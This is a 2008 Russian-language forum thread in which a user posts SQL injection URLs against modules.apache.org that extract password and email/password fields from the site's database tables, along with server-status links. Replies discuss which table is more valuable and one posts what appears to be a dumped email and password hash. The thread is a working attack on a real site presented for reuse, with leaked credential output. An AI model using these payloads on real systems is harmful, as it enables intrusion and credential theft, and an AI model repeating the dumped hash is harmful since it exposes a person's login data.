apache.org

Discussion in 'Уязвимости' started by ~!DoK_tOR!~, 1 Aug 2008.

  1. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    SQL Injection на apache.org

    Найдено: 28.07.2008

    Вот что нашёл :

    Code:
    http://modules.apache.org/search.php?id=-1+union+select+password,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+module/*
    Code:
    http://modules.apache.org/search.php?id=-1+union+select+concat_ws(0x3a,aemail,apassword),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+access/*


    Apache Server Status
    http://apache.org/server-status

    Apache Server Information
    http://apache.org/servinfo

    Видео: http://xakername.ifolder.ru/7501509
     
    #1 ~!DoK_tOR!~, 1 Aug 2008
    Last edited: 19 Sep 2008
    7 people like this.
  2. Cmucl

    Cmucl Member

    Joined:
    21 Jun 2008
    Messages:
    12
    Likes Received:
    8
    Reputations:
    0
    таблица access,не так ценна как таблица module (поля url;password;maintemail)

    ;)
     
  3. Cmucl

    Cmucl Member

    Joined:
    21 Jun 2008
    Messages:
    12
    Likes Received:
    8
    Reputations:
    0
    [email protected]:antichat.ru:$1$rkR4HaMX$mYg01WrY9/fWMc7TY/Qp

    Впадлу розбиратся(((
     
  4. Каратель

    Joined:
    1 Aug 2008
    Messages:
    5
    Likes Received:
    5
    Reputations:
    0
    так просто :)